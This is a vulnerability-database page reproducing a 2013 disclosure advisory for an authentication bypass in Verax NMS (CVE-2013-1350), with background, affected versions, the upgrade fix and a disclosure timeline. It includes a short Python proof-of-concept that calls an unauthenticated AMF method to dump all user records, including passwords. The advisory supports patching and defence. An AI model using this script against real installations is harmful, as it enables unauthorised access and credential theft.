Vulners
Lucene search
Verax NMS Authentication Bypass
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2013-1350 | 30 Jan 202013:15 | – | cve |
 | CVE-2013-1350 | 30 Jan 202013:15 | – | cvelist |
 | EUVD-2013-1389 | 7 Oct 202500:30 | – | euvd |
 | CVE-2013-1350 | 30 Jan 202014:15 | – | nvd |
 | Verax Network Management System Multiple Vulnerabilities | 15 Mar 201300:00 | – | openvas |
 | Security feature bypass | 30 Jan 202014:15 | – | prion |
 | CVE-2013-1350 | 22 May 202506:15 | – | redhatcve |
 | Verax NMS Authenication Bypass (CVE-2013-1350) | 11 Mar 201300:00 | – | securityvulns |
| Verax NMS multiple security vulnerabilities | 11 Mar 201300:00 | – | securityvulns |
`Verax NMS Authenication Bypass (CVE-2013-1350)
I. BACKGROUND
----------------------
Verax NMS provides a service-oriented, unified
management & monitoring of networks, applications
and infrastructure enabling quick problem detection,
root-cause analysis, reporting and automating recovery,
reducing costs and shortening downtimes of IT service delivery.
Source: http://www.veraxsystems.com/en/products/nms
II. DESCRIPTION
----------------------
Verax NMS suffers from multiple authentication and
authorization flaws which allow a remote attacker to
add and delete users, change the passwords of other users,
and access other critical application data. These issues
stem from unauthenticated methods, such as userGroupService.getAllGroups(),
which fail to validate that the user either 1) has ownership or
access rights to the requested objects/resources and 2) fails to
confirm whether or not the caller has properly authenticated to the
application and still maintains a valid session.
The below Python code can be used to test vulnerable installations. If
successful, the response will contain an array of user objects which
includes all user details, such as username, password, e-mail address, etc.
----------------------
#!/usr/bin/python
#just based on http://www.pyamf.org/tutorials/general/client.html#basic-example
from pyamf import AMF0, AMF3
from pyamf.remoting.client import RemotingService
client = RemotingService('http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf',
amf_version=AMF3)
service = client.getService('userService')
print service.getAllUsers()
----------------------
III. AFFECTED PRODUCTS
----------------------
All versions of Verax NMS prior to 2.1.0 are vulnerable.
IV. RECCOMENDATION
----------------------
Users should upgrade to version 2.1.0 of Verax NMS.
V. CREDIT
----------------------
This vulnerability was discovered by Andrew Brooks.
VI. REFERENCES
----------------------
CVE-2013-1350
http://download.veraxsystems.com/download/nms-2.1.0-release-notes.txt
VII. TIMELINE
----------------------
1/10/2013 - Vendor notified
1/11/2013 - Vendor acknowledges bug report
2/20/2013 - Vulnerability remediated and pushed to mainline
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Mar 2013 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.00606